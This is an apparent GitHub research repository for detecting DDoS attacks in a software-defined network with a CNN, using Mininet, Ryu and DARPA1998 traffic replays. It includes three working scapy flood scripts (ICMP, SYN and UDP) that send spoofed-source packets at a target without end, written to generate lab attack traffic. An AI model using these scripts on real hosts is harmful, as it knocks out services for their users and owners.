├── cnn ├── .gitignore └── training.py ├── image ├── .gitignore └── draw.py ├── raw_data ├── .gitignore ├── tcpdump_regenerator.py ├── tcpdump_separator.sh ├── run.sh └── tcpdump_regenerator_print.py ├── mininet ├── .gitignore ├── run.sh ├── topo.jpg ├── topo.py └── easy_run.py ├── .gitignore ├── darpa ├── sample_data01.tcpdump ├── attack_analysis.sh └── attack_analysis.py ├── stat ├── figure │ ├── 21flow_all.png │ ├── 24PPf_all.png │ ├── 28entropy_all.png │ ├── 20pair_flow_all.png │ ├── 23flow_interval.png │ ├── 25PPf_interval.png │ ├── 30entropy_ratio.png │ ├── 14bytes_mean_ratio.png │ ├── 26pair_flow_ratio.png │ ├── 29entropy_interval.png │ ├── 6packet_mean_ratio.png │ ├── 10packet_median_ratio.png │ ├── 18packet_median_ratio.png │ ├── 1packet_count_total.png │ ├── 22pair_flow_interval.png │ ├── 3packet_count_ratio.png │ ├── 2packet_count_interval.png │ ├── 12mean_of_all_bytes_count.png │ ├── 4mean_of_all_packet_count.png │ ├── 16median_of_all_bytes_count.png │ ├── 31entropy_relative_distance.png │ ├── 8median_of_all_packet_count.png │ ├── 13mean_of_interval_bytes_count.png │ ├── 15bytes_mean_relative_distance.png │ ├── 27pair_flow_relative_distance.png │ ├── 5mean_of_interval packet_count.png │ ├── 7packet_mean_relative_distance.png │ ├── 11packet_median_relative_distance.png │ ├── 17median_of_interval_bytes_count.png │ ├── 19packet_median_relative_distance.png │ └── 9median_of_interval_packet_count.png ├── treshold_script.m ├── scatter_script.m └── image_analysis.m ├── scapy ├── attack_tools │ ├── icmpflood.py │ ├── synflood.py │ └── udpflood.py ├── realtime_tcpdumplist_regenerator.py └── realtime_tcpdump_regenerator.py ├── README.md └── ryu ├── monitor.py ├── app_realtime.py └── app.py /cnn/.gitignore: -------------------------------------------------------------------------------- 1 | virenv -------------------------------------------------------------------------------- /image/.gitignore: -------------------------------------------------------------------------------- 1 | *pic -------------------------------------------------------------------------------- /raw_data/.gitignore: -------------------------------------------------------------------------------- 1 | data_* -------------------------------------------------------------------------------- /mininet/.gitignore: -------------------------------------------------------------------------------- 1 | sample.py 2 | mininet.py -------------------------------------------------------------------------------- /mininet/run.sh: -------------------------------------------------------------------------------- 1 | sudo mn --custom easy_topo.py --topo mytopo --controller=remote 2 | -------------------------------------------------------------------------------- /mininet/topo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/mininet/topo.jpg -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | *.out 3 | test* 4 | training_data 5 | *log* 6 | .DS_Store 7 | n_* 8 | data -------------------------------------------------------------------------------- /darpa/sample_data01.tcpdump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/darpa/sample_data01.tcpdump -------------------------------------------------------------------------------- /stat/figure/21flow_all.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/21flow_all.png -------------------------------------------------------------------------------- /stat/figure/24PPf_all.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/24PPf_all.png -------------------------------------------------------------------------------- /stat/figure/28entropy_all.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/28entropy_all.png -------------------------------------------------------------------------------- /stat/figure/20pair_flow_all.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/20pair_flow_all.png -------------------------------------------------------------------------------- /stat/figure/23flow_interval.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/23flow_interval.png -------------------------------------------------------------------------------- /stat/figure/25PPf_interval.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/25PPf_interval.png -------------------------------------------------------------------------------- /stat/figure/30entropy_ratio.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/30entropy_ratio.png -------------------------------------------------------------------------------- /stat/figure/14bytes_mean_ratio.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/14bytes_mean_ratio.png -------------------------------------------------------------------------------- /stat/figure/26pair_flow_ratio.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/26pair_flow_ratio.png -------------------------------------------------------------------------------- /stat/figure/29entropy_interval.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/29entropy_interval.png -------------------------------------------------------------------------------- /stat/figure/6packet_mean_ratio.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/6packet_mean_ratio.png -------------------------------------------------------------------------------- /stat/figure/10packet_median_ratio.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/10packet_median_ratio.png -------------------------------------------------------------------------------- /stat/figure/18packet_median_ratio.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/18packet_median_ratio.png -------------------------------------------------------------------------------- /stat/figure/1packet_count_total.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/1packet_count_total.png -------------------------------------------------------------------------------- /stat/figure/22pair_flow_interval.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/22pair_flow_interval.png -------------------------------------------------------------------------------- /stat/figure/3packet_count_ratio.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/3packet_count_ratio.png -------------------------------------------------------------------------------- /stat/figure/2packet_count_interval.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/2packet_count_interval.png -------------------------------------------------------------------------------- /stat/figure/12mean_of_all_bytes_count.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/12mean_of_all_bytes_count.png -------------------------------------------------------------------------------- /stat/figure/4mean_of_all_packet_count.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/4mean_of_all_packet_count.png -------------------------------------------------------------------------------- /stat/figure/16median_of_all_bytes_count.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/16median_of_all_bytes_count.png -------------------------------------------------------------------------------- /stat/figure/31entropy_relative_distance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/31entropy_relative_distance.png -------------------------------------------------------------------------------- /stat/figure/8median_of_all_packet_count.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/8median_of_all_packet_count.png -------------------------------------------------------------------------------- /stat/figure/13mean_of_interval_bytes_count.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/13mean_of_interval_bytes_count.png -------------------------------------------------------------------------------- /stat/figure/15bytes_mean_relative_distance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/15bytes_mean_relative_distance.png -------------------------------------------------------------------------------- /stat/figure/27pair_flow_relative_distance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/27pair_flow_relative_distance.png -------------------------------------------------------------------------------- /stat/figure/5mean_of_interval packet_count.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/5mean_of_interval packet_count.png -------------------------------------------------------------------------------- /stat/figure/7packet_mean_relative_distance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/7packet_mean_relative_distance.png -------------------------------------------------------------------------------- /stat/figure/11packet_median_relative_distance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/11packet_median_relative_distance.png -------------------------------------------------------------------------------- /stat/figure/17median_of_interval_bytes_count.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/17median_of_interval_bytes_count.png -------------------------------------------------------------------------------- /stat/figure/19packet_median_relative_distance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/19packet_median_relative_distance.png -------------------------------------------------------------------------------- /stat/figure/9median_of_interval_packet_count.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/laochonlam/SDN_DDoS_CNN/HEAD/stat/figure/9median_of_interval_packet_count.png -------------------------------------------------------------------------------- /stat/treshold_script.m: -------------------------------------------------------------------------------- 1 | % This script find threshold of a matrix 2 | 3 | threshold = (2*10^4); 4 | 5 | fileID = fopen('n_packets_week1','r'); 6 | formatSpec = '%d'; 7 | A = fscanf(fileID, formatSpec); 8 | A = transpose(A); 9 | indices = find(A > threshold); 10 | A(indices) = []; 11 | 12 | disp(length(indices)); 13 | disp(length(A)); -------------------------------------------------------------------------------- /mininet/topo.py: -------------------------------------------------------------------------------- 1 | from mininet.topo import Topo 2 | 3 | class CustomTopo( Topo ): 4 | 5 | def __init__( self ): 6 | Topo.__init__(self) 7 | 8 | s0 = self.addSwitch("s0") 9 | s1 = self.addSwitch("s1") 10 | s2 = self.addSwitch("s2") 11 | 12 | # inside the network 13 | h0 = self.addHost("h0") 14 | h1 = self.addHost("h1") 15 | 16 | # attackers 17 | h2 = self.addHost("h2") 18 | h3 = self.addHost("h3") 19 | h4 = self.addHost("h4") 20 | 21 | self.addLink(s0, s1) 22 | self.addLink(s0, s2) 23 | self.addLink(s0, h2) 24 | self.addLink(s1, h0) 25 | self.addLink(s2, h1) 26 | self.addLink(s0, h3) 27 | self.addLink(s0, h4) 28 | 29 | topos = { 'mytopo': (lambda: CustomTopo())} 30 | -------------------------------------------------------------------------------- /scapy/attack_tools/icmpflood.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import random 5 | import sys 6 | import threading 7 | from scapy.all import * 8 | 9 | if len(sys.argv) != 3: 10 | print "Usage: %s " % sys.argv[0] 11 | sys.exit(1) 12 | 13 | target = sys.argv[1] 14 | port = int(sys.argv[2]) 15 | interface = sys.argv[3] 16 | 17 | total = 0 18 | 19 | 20 | class sendICMP(threading.Thread): 21 | # inheritance threading.Thread 22 | global target, port 23 | 24 | def __init__(self): 25 | threading.Thread.__init__(self) 26 | 27 | def run(self): 28 | i = IP() 29 | i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 30 | 1, 254), random.randint(1, 254), random.randint(1, 254)) 31 | i.dst = target 32 | 33 | t = ICMP() 34 | 35 | send(i / t, verbose=0, iface=interface) 36 | 37 | 38 | print "Flooding %s:%i with ICMP packets." % (target, port) 39 | while 1: 40 | sendICMP().start() 41 | total += 1 42 | sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total) 43 | -------------------------------------------------------------------------------- /scapy/realtime_tcpdumplist_regenerator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This script generate flow by tcpdumplist in day time 3 | 4 | import sys 5 | from datetime import datetime 6 | from scapy.all import * 7 | 8 | def main(): 9 | if len(sys.argv) != 2: 10 | print "Usage : %s " % sys.argv[0] 11 | sys.exit(1) 12 | 13 | filename = sys.argv[1] 14 | with open(filename) as f: 15 | file = f.read().splitlines() 16 | 17 | for line in file: 18 | line = line.split() 19 | #only look for HTTP packet 20 | while(1): 21 | current_time = datetime.now().strftime('%H:%M:%S') 22 | # print("current:" + current_time + " line[2]:" + line[2]) 23 | if (current_time == line[2]): 24 | print("BINGO!!!!!") 25 | break 26 | if (current_time > line[2]): 27 | break 28 | print("next") 29 | if (line[4] == "http"): 30 | print(line[4]) 31 | 32 | if __name__ == "__main__": 33 | main() -------------------------------------------------------------------------------- /scapy/attack_tools/synflood.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import random 5 | import sys 6 | import threading 7 | from scapy.all import * 8 | 9 | if len(sys.argv) != 3: 10 | print "Usage: %s " % sys.argv[0] 11 | sys.exit(1) 12 | 13 | target = sys.argv[1] 14 | port = int(sys.argv[2]) 15 | interface = sys.argv[3] 16 | total = 0 17 | 18 | 19 | class sendSYN(threading.Thread): 20 | # inheritance threading.Thread 21 | global target, port 22 | 23 | def __init__(self): 24 | threading.Thread.__init__(self) 25 | 26 | def run(self): 27 | i = IP() 28 | i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 29 | 1, 254), random.randint(1, 254), 7) 30 | i.dst = target 31 | 32 | t = TCP() 33 | t.sport = random.randint(1, 65535) 34 | t.dport = port 35 | t.flags = 'S' 36 | 37 | send(i / t, verbose=0, iface=interface) 38 | 39 | 40 | print "Flooding %s:%i with SYN packets." % (target, port) 41 | while 1: 42 | sendSYN().start() 43 | total += 1 44 | sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total) 45 | -------------------------------------------------------------------------------- /scapy/attack_tools/udpflood.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import random 5 | import sys 6 | import threading 7 | from scapy.all import * 8 | 9 | if len(sys.argv) != 3: 10 | print "Usage: %s " % sys.argv[0] 11 | sys.exit(1) 12 | 13 | target = sys.argv[1] 14 | port = int(sys.argv[2]) 15 | total = 0 16 | 17 | 18 | class sendUDP(threading.Thread): 19 | global target, port 20 | 21 | def __init__(self): 22 | threading.Thread.__init__(self) 23 | 24 | def run(self): 25 | i = IP() 26 | i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 27 | 1, 254), random.randint(1, 254), random.randint(1, 254)) 28 | i.dst = target 29 | t = UDP() 30 | t = UDP() 31 | t.sport = random.randint(1, 65535) 32 | t.dport = port 33 | 34 | 35 | send(i/ t, verbose=0, iface="h0-eth0") 36 | 37 | print "Flooding %s:%i with UDP packets." %(target, port) 38 | while 1: 39 | sendUDP().start() 40 | total += 1 41 | sys.stdout.write("\rTotal packets send:\t\t\t%i" % total) 42 | 43 | -------------------------------------------------------------------------------- /scapy/realtime_tcpdump_regenerator.py: -------------------------------------------------------------------------------- 1 | # This script generate flow by tcpdump in day time 2 | 3 | from scapy.all import * 4 | from datetime import datetime 5 | import sys 6 | 7 | def main(): 8 | if len(sys.argv) != 2: 9 | print "Usage : %s " % sys.argv[0] 10 | sys.exit(1) 11 | 12 | filename = sys.argv[1] 13 | packets = rdpcap(filename) 14 | print("read file completed") 15 | for packet in packets: 16 | while(1): 17 | current_time = datetime.now().strftime('%H:%M:%S') 18 | packet_time = datetime.fromtimestamp(packet.time).strftime('%H:%M:%S') 19 | print("current:" + current_time + " packet_time:" + packet_time) 20 | if (current_time == packet_time): 21 | print("BINGO!!!!!") 22 | break 23 | if (current_time > packet_time): 24 | break 25 | print("next") 26 | # if packet.haslayer("HTTPRequest"): 27 | # sendp(packet, iface="h0-eth0") 28 | # packet_time = datetime.fromtimestamp(packet.time).strftime('%H:%M:%S') 29 | print("SUCCESS") 30 | 31 | 32 | if __name__ == "__main__": 33 | main() -------------------------------------------------------------------------------- /mininet/easy_run.py: -------------------------------------------------------------------------------- 1 | from mininet.topo import Topo 2 | from mininet.net import Mininet 3 | from mininet.cli import CLI 4 | from mininet.node import RemoteController 5 | from functools import partial 6 | 7 | def int2dpid( dpid ): 8 | try: 9 | dpid = hex( dpid )[ 2: ] 10 | dpid = '0' * ( 16 - len( dpid ) ) + dpid 11 | return dpid 12 | except IndexError: 13 | raise Exception( 'Unable to derive default datapath ID - ' 14 | 'please either specify a dpid or use a ' 15 | 'canonical switch name such as s23.' ) 16 | 17 | 18 | class CustomTopo( Topo ): 19 | 20 | def build( self, n=2 ): 21 | 22 | s0 = self.addSwitch("s0", dpid=int2dpid(1)) 23 | # hidden parameter: protocols="OpenFlow13" 24 | # inside the network 25 | h0 = self.addHost("h0", ip='10.0.0.1', mac='00:00:00:00:01:00') 26 | h1 = self.addHost("h1", ip='10.0.0.2', mac='00:00:00:00:02:00') 27 | 28 | self.addLink(s0, h0) 29 | self.addLink(s0, h1) 30 | 31 | def run(): 32 | topo = CustomTopo( n=2 ) 33 | net = Mininet(topo=topo, controller=RemoteController) 34 | # net.addNAT().configDefault() 35 | net.start() 36 | CLI(net) 37 | net.stop() 38 | 39 | if __name__ == '__main__': 40 | run() -------------------------------------------------------------------------------- /stat/scatter_script.m: -------------------------------------------------------------------------------- 1 | % This script is use for plot 2 | 3 | %% n_packets 4 | fileID = fopen('n_packets_week1','r'); 5 | formatSpec = '%d'; 6 | A = fscanf(fileID, formatSpec); 7 | A = transpose(A); 8 | % threshold = (150); 9 | % indices = find(A > threshold); 10 | % A(indices) = []; 11 | 12 | fileID = fopen('n_packets_week2','r'); 13 | formatSpec = '%d'; 14 | B = fscanf(fileID, formatSpec); 15 | B = transpose(B); 16 | 17 | %% n_bytes 18 | fileID = fopen('n_bytes_week1','r'); 19 | formatSpec = '%d'; 20 | C = fscanf(fileID, formatSpec); 21 | C = transpose(C); 22 | 23 | fileID = fopen('n_bytes_week2','r'); 24 | formatSpec = '%d'; 25 | D = fscanf(fileID, formatSpec); 26 | D = transpose(D); 27 | 28 | %% plot 29 | 30 | figure; 31 | y = linspace(1, length(A), length(A)); 32 | npacketsw1 = subplot(2, 2, 1); 33 | scatter(npacketsw1, y, A); 34 | title("week1: n\_packets"); 35 | xlabel("number"); 36 | ylabel("value"); 37 | 38 | y = linspace(1, length(B), length(B)); 39 | npacketsw2 = subplot(2, 2, 2); 40 | scatter(npacketsw2, y, B); 41 | title("week2: n\_packets"); 42 | xlabel("number"); 43 | ylabel("value"); 44 | 45 | y = linspace(1, length(C), length(C)); 46 | nbytesw1 = subplot(2, 2, 3); 47 | scatter(nbytesw1, y, C); 48 | title("week1: n\_bytes"); 49 | xlabel("number"); 50 | ylabel("value"); 51 | 52 | y = linspace(1, length(D), length(D)); 53 | nbytesw2 = subplot(2, 2, 4); 54 | scatter(nbytesw2, y, D); 55 | title("week1: n\_bytes"); 56 | xlabel("number"); 57 | ylabel("value"); 58 | 59 | 60 | disp(mean(A)); 61 | disp(mean(B)); 62 | disp(mean(C)); 63 | disp(mean(D)); 64 | -------------------------------------------------------------------------------- /raw_data/tcpdump_regenerator.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from datetime import datetime 3 | import sys 4 | import subprocess 5 | from datetime import datetime 6 | from datetime import timedelta 7 | import csv 8 | 9 | def main(): 10 | if len(sys.argv) != 2: 11 | print "Usage : %s " % sys.argv[0] 12 | sys.exit(1) 13 | 14 | 15 | csvfile = open("./attacklog.csv", 'r') 16 | csvreader = csv.reader(csvfile) 17 | 18 | time_list = [] 19 | for row in csvreader: 20 | time = datetime.strptime(row[2] + ':' + row[3], '%m/%d/%Y:%H:%M:%S').strftime('%m/%d/%Y_%H:%M:%S') 21 | time_list.append(time) 22 | time = datetime.strptime(row[2] + ':' + row[4], '%m/%d/%Y:%H:%M:%S').strftime('%m/%d/%Y_%H:%M:%S') 23 | time_list.append(time) 24 | print(time_list) 25 | time_list_index = 0 26 | 27 | 28 | 29 | filename = sys.argv[1] 30 | command = "find " + filename +" -iname 'new_file*' -printf \"%T@ %Tc %p\n\" | sort -n | awk '{print $7}'" 31 | paths = subprocess.check_output(command, shell=True).splitlines() 32 | 33 | # paths = '/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/wednesday/new_files22' 34 | print(paths) 35 | interval = 5 36 | interface = "h0-eth0" 37 | datapath = "s0" 38 | secsdelta = timedelta(seconds=interval) 39 | 40 | 41 | 42 | for i, path in enumerate(paths, start=0): 43 | packets = rdpcap(path) 44 | print("%d read pcap %s completed. time: %s" % (i, path, str(datetime.now()))) 45 | 46 | 47 | for packet in packets: 48 | packet_time = datetime.fromtimestamp(packet.time).strftime('%m/%d/%Y_%H:%M:%S') 49 | if packet_time > time_list[time_list_index]: 50 | current_time = datetime.now().strftime('%m/%d/%Y_%H:%M:%S') 51 | time_file = open("data/time_point", "a+") 52 | time_file.write(time_list[time_list_index] + "\t" + current_time + "\n" ) 53 | time_file.close() 54 | time_list_index = time_list_index + 1 55 | if packet.haslayer(TCP) or packet.haslayer(UDP): 56 | sendp(packet, iface=interface, verbose=0) 57 | print("%d insert pcap %s completed. time: %s" % (i, path, str(datetime.now()))) 58 | 59 | 60 | 61 | 62 | if __name__ == "__main__": 63 | main() -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Experiment 2 | 3 | ## File Structure 4 | - cnn/ 5 | - training.py (deprecated) 6 | - CNN InceptionV3 training script with Keras (use [model/InceptionV3](https://github.com/tensorflow/models/tree/master/research/inception) with Tensorflow instead) 7 | - darpa/ 8 | - attack_analysis.py 9 | - Script that parses the TCPDUMP files extracted from DARPA1998. 10 | - attack_analysis.sh 11 | - `attack_analysis.py` running script. 12 | - sample_data01.tcpdump 13 | - Sample TCPDUMP file 14 | - The full list of DARPA1998 TCPDUMP files can be found in [DARPA1998](https://www.ll.mit.edu/r-d/datasets/1998-darpa-intrusion-detection-evaluation-data-set). 15 | - image/ 16 | - draw.py 17 | - Script that uses to generate images for CNN training. 18 | - mininet/ 19 | - easy_run.py 20 | - Experiment scene as paper described. 21 | - run.sh 22 | - `easy_run.py` running script. 23 | - topo.jpg (deprecated) 24 | - topo.py (deprecated) 25 | - raw_data/ 26 | - tcpdump_regenerator.py 27 | - Regenerating the traffic in DARPA1998 in the way of importing the TCPDUMP files into a Openvswitch (as paper described). 28 | - tcpdump_regenerator_print.py (deprecated) 29 | - tcpdumo_separator.sh 30 | - Separating TCPDUMP files into smaller one for further processing. 31 | - run.sh 32 | - `tcpdumo_separator.sh` running script. 33 | - ryu/ 34 | - app_realtime.py (deprecated) 35 | - app.py 36 | - Experimental controller. 37 | - monitor.py 38 | - Capturing the network state and stats in intervals. 39 | - scapy/ 40 | - attack_tools/ 41 | - icmpflood.py 42 | - synflood.py 43 | - udpflood.py 44 | - realtime_tcpdump_regenerator.py (deprecated) 45 | - realtime_tcpdumplist_regenerator.py (deprecated) 46 | - stat/ 47 | - figure/ 48 | - The result of experiment that test the performance of 31 network features. 49 | - Red dots represent abnormal situation (being attack). 50 | - The attack traffic is generated by the scripts in `attack_tools`. 51 | - DARPA1998 week3 data traffic + generated traffic 52 | - Blue dots represent normal situation. 53 | - DARPA1998 week3 data traffic only 54 | - 10 secs/sample. 55 | - image_analysis.m 56 | - Script thats plot the result of experiment with Matlab. 57 | - scatter_script.m (deprecated) 58 | - treshold_script.m (deprecated) -------------------------------------------------------------------------------- /raw_data/tcpdump_separator.sh: -------------------------------------------------------------------------------- 1 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/monday 2 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 3 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/tuesday 4 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 5 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/wednesday 6 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 7 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/thursday 8 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 9 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/friday 10 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 11 | 12 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_4/monday 13 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 14 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_4/tuesday 15 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 16 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_4/wednesday 17 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 18 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_4/thursday 19 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 20 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_4/friday 21 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 22 | 23 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_5/monday 24 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 25 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_5/tuesday 26 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 27 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_5/wednesday 28 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 29 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_5/thursday 30 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 31 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_5/friday 32 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 33 | 34 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_6/monday 35 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 36 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_6/tuesday 37 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 38 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_6/wednesday 39 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 40 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_6/thursday 41 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 42 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_6/friday 43 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 44 | 45 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_7/monday 46 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 47 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_7/tuesday 48 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 49 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_7/wednesday 50 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 51 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_7/thursday 52 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 53 | P=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_7/friday 54 | tcpdump -r ${P}/tcpdump -w ${P}/new_files -C 10 -------------------------------------------------------------------------------- /cnn/training.py: -------------------------------------------------------------------------------- 1 | from keras.applications.inception_v3 import InceptionV3, preprocess_input 2 | from keras.preprocessing import image 3 | from keras.models import Model 4 | from keras.layers import Dense, GlobalAveragePooling2D 5 | from keras.preprocessing.image import ImageDataGenerator 6 | from keras import backend as K 7 | 8 | 9 | import os 10 | import sys 11 | import glob 12 | 13 | def get_nb_files(directory): 14 | """Get number of files by searching directory recursively""" 15 | if not os.path.exists(directory): 16 | return 0 17 | cnt = 0 18 | for r, dirs, files in os.walk(directory): 19 | for dr in dirs: 20 | cnt += len(glob.glob(os.path.join(r, dr + "/*"))) 21 | return cnt 22 | 23 | IM_WIDTH, IM_HEIGHT = 299, 299 24 | FC_SIZE = 1024 25 | 26 | train_dir = '/Users/laochanlam/data/train' 27 | val_dir = '/Users/laochanlam/data/validation' 28 | 29 | nb_classes = 2 30 | nb_epoch = 3 31 | nb_train_samples = get_nb_files(train_dir) 32 | nb_val_samples = get_nb_files(val_dir) 33 | 34 | batch_size = 16 35 | 36 | train_datagen = ImageDataGenerator( 37 | preprocessing_function=preprocess_input 38 | ) 39 | 40 | test_datagen = ImageDataGenerator( 41 | preprocessing_function=preprocess_input 42 | ) 43 | 44 | train_generator = train_datagen.flow_from_directory( 45 | train_dir, 46 | target_size=(IM_WIDTH, IM_HEIGHT), 47 | batch_size=batch_size, class_mode='categorical' 48 | ) 49 | 50 | validation_generator = test_datagen.flow_from_directory( 51 | val_dir, 52 | target_size=(IM_WIDTH, IM_HEIGHT), 53 | batch_size=batch_size, class_mode='categorical' 54 | ) 55 | 56 | 57 | 58 | # create the base pre-trained model 59 | base_model = InceptionV3(weights='imagenet', include_top=False) 60 | 61 | # add a global spatial average pooling layer 62 | x = base_model.output 63 | x = GlobalAveragePooling2D()(x) 64 | # let's add a fully-connected layer 65 | x = Dense(FC_SIZE, activation='relu')(x) 66 | # and a logistic layer -- let's say we have 2 classes 67 | predictions = Dense(nb_classes, activation='softmax')(x) 68 | 69 | # this is the model we will train 70 | model = Model(inputs=base_model.input, outputs=predictions) 71 | 72 | # first: train only the top layers (which were randomly initialized) 73 | # i.e. freeze all convolutional InceptionV3 layers 74 | for layer in base_model.layers: 75 | layer.trainable = False 76 | 77 | # compile the model (should be done *after* setting layers to non-trainable) 78 | model.compile(optimizer='rmsprop', loss='categorical_crossentropy') 79 | 80 | # train the model on the new data for a few epochs 